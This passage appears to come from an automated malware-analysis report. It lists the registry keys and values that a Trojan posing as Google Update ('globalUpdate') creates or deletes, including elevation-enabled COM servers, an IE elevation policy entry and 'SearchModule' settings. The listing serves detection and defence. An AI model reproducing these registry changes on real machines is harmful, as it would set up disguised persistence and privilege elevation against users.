"(Default)" = "IRegistrationUpdateHook"

[HKCR\globalUpdateUpdate.CoreMachineClass\CLSID]
"(Default)" = "{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}"

[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}\NumMethods]
"(Default)" = "10"

[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}]
"(Default)" = "IGoogleUpdate3WebSecurity"

[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}]
"(Default)" = "IGoogleUpdateCore"

[HKCR\globalUpdateUpdate.ProcessLauncher.1.0]
"(Default)" = "Google Update Process Launcher Class"

[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}\NumMethods]
"(Default)" = "4"

[HKCR\globalUpdateUpdate.CoCreateAsync\CurVer]
"(Default)" = "globalUpdateUpdate.CoCreateAsync.1.0"

[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}\NumMethods]
"(Default)" = "10"

[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}]
"(Default)" = "IAppVersionWeb"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdate.OneClickProcessLauncherMachine]
"(Default)" = "globalUpdate.OneClickProcessLauncher"

[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}\NumMethods]
"(Default)" = "24"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B 5D 71 08 0A FC A9 DC 0B 64 56 EF 0F 45 AB 35"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachine"

[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}]
"(Default)" = "IGoogleUpdate3"

[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\ProgID]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine.1.0"

[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}\InProcServer32]
"ThreadingModel" = "Both"

[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback.1.0"

[HKCR\globalUpdateUpdate.CredentialDialogMachine\CurVer]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine.1.0"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback.1.0\CLSID]
"(Default)" = "{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}"

[HKCR\globalUpdate.OneClickProcessLauncherMachine\CurVer]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine.1.0"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback\CLSID]
"(Default)" = "{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine"

[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine.1.0"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\Elevation]
"Enabled" = "1"

[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}\NumMethods]
"(Default)" = "8"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoreMachineClass"

[HKCR\globalUpdateUpdate.CoreMachineClass\CurVer]
"(Default)" = "globalUpdateUpdate.CoreMachineClass.1"

[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine"

[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\ProgID]
"(Default)" = "globalUpdateUpdate.CoCreateAsync.1.0"

[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"

[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}\NumMethods]
"(Default)" = "8"

[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}\InProcServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"

[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}]
"(Default)" = "ICurrentState"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\ProgID]
"(Default)" = "globalUpdateUpdate.CoreMachineClass.1"

[HKCR\globalUpdateUpdate.ProcessLauncher.1.0\CLSID]
"(Default)" = "{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}"

[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback"

[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}\NumMethods]
"(Default)" = "14"

[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoCreateAsync"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0"

[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine\CLSID]
"(Default)" = "{ADBC39BE-3D20-4333-8D99-E91EB1B62474}"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\globalUpdateUpdate.Update3WebMachine]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback.1.0]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"(Default)" = "globalUpdate.OneClickProcessLauncher"

[HKCR\globalUpdate.OneClickProcessLauncherMachine\CLSID]
"(Default)" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback"

[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}]
"(Default)" = "IOneClickProcessLauncher"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\globalUpdateUpdate.CredentialDialogMachine]
"(Default)" = "GoogleUpdate CredentialDialog"

[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdateUpdate.CoreMachineClass.1\CLSID]
"(Default)" = "{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\Elevation]
"Enabled" = "1"

[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"CLSID" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}]
"(Default)" = "Google Update Core Class"

[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}]
"(Default)" = "ICoCreateAsync"

[HKCR\globalUpdate.OneClickProcessLauncherMachine.1.0]
"(Default)" = "globalUpdate.OneClickProcessLauncher"

[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}]
"(Default)" = "PSFactoryBuffer"

[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}]
"(Default)" = "IPackage"

[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}\NumMethods]
"(Default)" = "5"

[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.ProcessLauncher"

[HKCR\globalUpdateUpdate.ProcessLauncher\CurVer]
"(Default)" = "globalUpdateUpdate.ProcessLauncher.1.0"

[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}]
"(Default)" = "IAppWeb"

[HKCR\globalUpdateUpdate.CoCreateAsync]
"(Default)" = "CoCreateAsync"

[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}\NumMethods]
"(Default)" = "10"

[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\VersionIndependentProgID]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine"

[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\ProgID]
"(Default)" = "globalUpdateUpdate.ProcessLauncher.1.0"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0\CLSID]
"(Default)" = "{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}"

[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"

[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}\NumMethods]
"(Default)" = "4"

[HKCR\globalUpdateUpdate.CoreMachineClass.1]
"(Default)" = "Google Update Core Class"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\globalUpdateUpdate.CoCreateAsync.1.0\CLSID]
"(Default)" = "{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}"

[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}]
"(Default)" = "Google Update Process Launcher Class"

[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}\NumMethods]
"(Default)" = "4"

[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}]
"(Default)" = "IAppBundle"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}\NumMethods]
"(Default)" = "6"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine.1.0\CLSID]
"(Default)" = "{ADBC39BE-3D20-4333-8D99-E91EB1B62474}"

[HKCR\globalUpdateUpdate.Update3WebMachine\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebMachine.1.0"

[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}\NumMethods]
"(Default)" = "10"

[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"

[HKCR\globalUpdateUpdate.CredentialDialogMachine.1.0]
"(Default)" = "GoogleUpdate CredentialDialog"

[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}\NumMethods]
"(Default)" = "39"

[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}]
"(Default)" = "IAppBundleWeb"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdateUpdate.CoCreateAsync\CLSID]
"(Default)" = "{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}]
"(Default)" = "IAppVersion"

[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}]
"(Default)" = "IProgressWndEvents"

[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}]
"(Default)" = "IBrowserHttpRequest2"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback\CLSID]
"(Default)" = "{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}"

[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}]
"(Default)" = "IGoogleUpdate"

[HKCR\globalUpdateUpdate.CredentialDialogMachine.1.0\CLSID]
"(Default)" = "{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}]
[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}]

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"

The process GoogleUpdate.exe:1648 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc.1.0"

[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3COMClassService.1.0"

[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"ServiceParameters" = "/comsvc"

[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\globalUpdateUpdate.CoreClass\CurVer]
"(Default)" = "globalUpdateUpdate.CoreClass.1"

[HKCR\globalUpdateUpdate.CoreClass\CLSID]
"(Default)" = "{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}"

[HKCR\globalUpdateUpdate.Update3WebSvc.1.0]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\globalUpdateUpdate.Update3WebSvc]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\globalUpdateUpdate.Update3COMClassService.1.0]
"(Default)" = "Update3COMClass"

[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"(Default)" = "Update3COMClass"

[HKCR\AppID\GoogleUpdate.exe]
"AppID" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"

[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebSvc"

[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc"

[HKCR\globalUpdateUpdate.CoreClass]
"(Default)" = "Google Update Core Class"

[HKCR\globalUpdateUpdate.Update3WebSvc\CLSID]
"(Default)" = "{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}"

[HKCR\globalUpdateUpdate.Update3COMClassService\CLSID]
"(Default)" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"

[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoreClass"

[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"(Default)" = "ServiceModule"

[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}\ProgID]
"(Default)" = "globalUpdateUpdate.CoreClass.1"

[HKCR\globalUpdateUpdate.Update3COMClassService]
"(Default)" = "Update3COMClass"

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\globalUpdateUpdate.Update3WebSvc.1.0\CLSID]
"(Default)" = "{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}"

[HKCR\globalUpdateUpdate.Update3COMClassService\CurVer]
"(Default)" = "globalUpdateUpdate.Update3COMClassService.1.0"

[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"ServiceParameters" = "/comsvc"

[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebSvc.1.0"

[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"LocalService" = "globalUpdatem"

[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"AppID" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C 0A 48 AB C1 29 C2 6E 94 F0 BA A0 48 EC 50 05"

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc.1.0]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc.1.0"

[HKCR\globalUpdateUpdate.CoreClass.1\CLSID]
"(Default)" = "{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}"

[HKCR\globalUpdateUpdate.CoreClass.1]
"(Default)" = "Google Update Core Class"

[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"LocalService" = "globalUpdate"

[HKCR\globalUpdateUpdate.Update3WebSvc\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebSvc.1.0"

[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"(Default)" = "ServiceModule"

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc\CLSID]
"(Default)" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3COMClassService"

[HKCR\globalUpdateUpdate.Update3COMClassService.1.0\CLSID]
"(Default)" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"

[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}]
"(Default)" = "Google Update Core Class"

[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc.1.0\CLSID]
"(Default)" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

The Trojan deletes the following registry key(s):

[HKCR\AppID\GoogleUpdate.exe]

The process GoogleUpdate.exe:2176 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DF 6E 02 0C E8 5C F5 43 D6 5C 9E C2 C7 A9 ED 6F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\globalUpdate\Update]
"GoogleUpdate.exe" = "globalUpdate Update"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"uid"

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"c"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"eulaaccepted"

The process GoogleUpdate.exe:3376 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B 9A 65 42 37 DF D7 0F A9 DC 5C 04 57 28 81 C7"

[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"

The process GoogleUpdate.exe:2792 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 8F 96 17 AC D3 71 17 1F 2D 6B 13 A7 15 59 B3"

[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"

The process GoogleUpdate.exe:2800 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 A6 9C 3A C3 9E 06 AF AB C4 E5 09 62 47 74 A3"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"eulaaccepted"

The process smu.exe:3500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D F9 D3 BE 2E 49 A2 F3 5E FF AA F6 CD 9C 3B 4B"

[HKLM\SOFTWARE\SearchModule\SMUpd]
"Scf" = "DF BC A0 3D 31 49 10 C8 A2 BC 71 89 44 E2 DF D4"

The process smu.exe:3548 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 3D B3 48 5F 90 FB C3 16 83 F2 34 A6 72 CD 54"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\SearchModule\SMUpd]
"Ubl" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\SearchModule\SMUpd]
"Scf" = "23 2C 1C 3D 18 D8 CF AF C7 E3 B5 8D 85 4D C2 9B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\SearchModule\SMUpd]
"Rlt" = "Type: REG_QWORD, Length: 8"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "0"

[HKLM\SOFTWARE\SearchModule\SMUpd]
"Ult" = "Type: REG_QWORD, Length: 8"

